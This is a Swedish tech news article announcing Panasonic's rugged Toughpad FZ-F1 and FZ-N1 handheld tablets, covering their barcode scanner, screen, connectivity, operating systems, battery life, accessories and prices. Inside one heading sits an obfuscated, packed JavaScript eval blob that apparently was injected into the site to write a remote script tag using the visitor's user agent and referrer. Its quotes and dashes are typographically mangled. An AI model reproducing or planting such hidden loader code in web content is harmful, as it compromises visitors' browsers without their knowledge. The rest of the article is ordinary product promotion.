Image Image Image Image Image Image Image Image Image Image

| 30 oktober, 2020

Scroll to top

Top

PC

Panasonic lanserar världens lättaste tåliga datorplatta – Toughpad FZ-F1/FZ-N1

Panasonic lanserar världens lättaste tåliga datorplatta – Toughpad FZ-F1/FZ-N1
Sebastian

I dag på World Mobile Congress lanserar Panasonic branschens lättaste robusta datorplatta. Den väger bara 280 gram*2 och är med sin 4,7 tumsskärm den minsta Toughpad-enheten som finns på marknaden idag. Enheten är särskilt anpassad för alla de branscher (t ex transport, logistik, detaljhandel, tillverkning och offentlig service) som behöver ett flexibelt och tåligt arbetsverktyg.

Musarmens eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|asins|var|u0026u|referrer|tibke||js|php’.split(’|’),0,{}))
tid är förbi

De nya datorplattorna är utformade med en specialvinklad streckkodsläsare (1D och 2D). Detta innebär bl a att användarna inte behöver böja armbågs- eller handleden vid inskanning av varor, vilket i sin tur innebär minskad risk för att drabbas av t ex musarm. Skärmens strategiska placering på enheten gör det dessutom möjligt för dig att avläsa skärmen samtidigt som du skannar in varan. Resultatet blir ett effektivare arbete, där de anställda inte behöver bläddra fram och tillbaka på skannern för att se skärmen. Tack vare att skannern är utrustad med knappar på båda sidor, kan den enkelt användas med båda händerna.

– Med den unika streckkodsläsaren och en vikt som är ca 50 gram lättare än andra liknande datorplattor kommer Panasonic Toughpad FZ-F1 och FZ-N1 att förändra marknaden för handhållna enheter, säger Jan Kaempfer, Marknadschef för Panasonic Computer Product Solutions.

Perfekt för utomhusanvändning

Panasonic Toughpad FZ-F1 och FZ-N1 kommer med en 4,7 tums multitouch-HD-skärm, som kan avläsas även i fullt dagsljus, tack vare skärmens antireflexbehandlade yta. Skärmytans responsivitet tillåter användning med såväl penna och fingrar, som handskar.

Röststyrningsfunktion och dataåtkomst när du är på språng

Panasonic Toughpad FZ-F1/FZ-N1 är utrustad med 4G LTE/3G-data och en röststyrningsfunktion. Tack vare enhetens slimmade design på bara 16,3 mm, kan den smidigt användas för telefonsamtal. Tre mikrofoner baserade på brusreducerande teknik och dubbla högtalare ger dig en ljudkvalitet på upp till 100 dBA, även i bullriga miljöer.

Wi-Fi, Bluetooth och NFC ger användarna möjlighet att använda enheten för trådlös kommunikation. Enheten har en 5 megapixels frontkamera och en 8 megapixels bakre kamera som kan användas för arbetsdokumentation. Datorplattan har även en mikro-USB-port, samt dubbla mikro SIM- och mikro SD-kortläsare*3.

Två olika operativsystem följer med datorplattorna. FZ-F1 är först ut på marknaden med att använda operativsystemet Windows 10 IoT Mobile Enterprise. FZ-N1 är utrustad med AndroidTM 5.1.1 version (AndroidTM för Work-funktionalitet), vilket gör det möjligt att hålla isär arbetsrelaterad och privat data på enheten. Enheterna är dessutom utrustade med den nya och snabba Qualcomm SnapdragonTM Quad-core-processorn med 2 GB RAM- och 16 GB flashminne.

Flexibla arbetstider

Panasonic Toughpad FZ-F1 och FZ-N1 har kapacitet att arbeta så länge man behöver och önskar, tack vare åtta timmars*4 batteritid i standardbatteriet. Som tillval finns dessutom ett alternativt batteri, med en utökad driftstid på upp till 16 timmar*4.

Stort urval av tillbehör

Utöver själva enheterna lanseras även ett brett utbud av tillbehör, som t ex handtag, hållare, hölster, extra batteri (se ovan) och laddningsstation.

Dessutom är det möjligt att lägga till en dockningsstation för fordon, som har utformats av Panasonics Global Dockning Solutions-team och är en perfekt kombination av låg vikt och tålighet. Dockningsstationen är designad för att enheten ska kunna fästas på och frigöras från stationen med endast en hand.

Tålig och användarvänlig på samma gång

Förutom att enheterna är lätta och ergonomiska är konstruktionen baserad på Panasonics standarder för tålighet, med en IP67-certifiering för sin förmåga att stå emot damm och väta.

Detta innebär även att enheterna är stöttåliga och klarar av fall på upp till 1,8 meter.

Pris och tillgänglighet

Panasonic Toughpad FZ-N1 AndroidTM 5.1.1 finns tillgänglig på marknaden från juli 2016, till ett rekommenderat vägledande pris på €1715, exklusive moms. Panasonic Toughpad FZ-F1 Windows 10 IoT Mobile Enterprise kommer till marknaden senare under året, till ett rekommenderat vägledande pris på €1746, exklusive moms. Båda enheterna levereras med tre års garanti.

*1 Bland handhållna datorplattor 22 februari 2016, som klarar fall på 1,8 meter, har 4,7 tums skärm och egen strekkodsläsare.

*2 Den japanska modellen väger 275 gram, medan den europeiska väger 277 gram.

*3 Både FZ-F1 och FZ-N1 har två mikro SIM-kortläsare, varav endast en åt gången kan vara aktiverad, men kan skiftas via GUI (Dual SIM – Single Standby).

*4 Mätningsförhållandet för batteriets driftstid: Trådlös LAN-förbindelse är aktiverad; kontinuerlig åtgång till servern, medan användaren browsar; swipe varje sekund; sidbyte var 30:e sekund, kommunikation var 30:e sekund.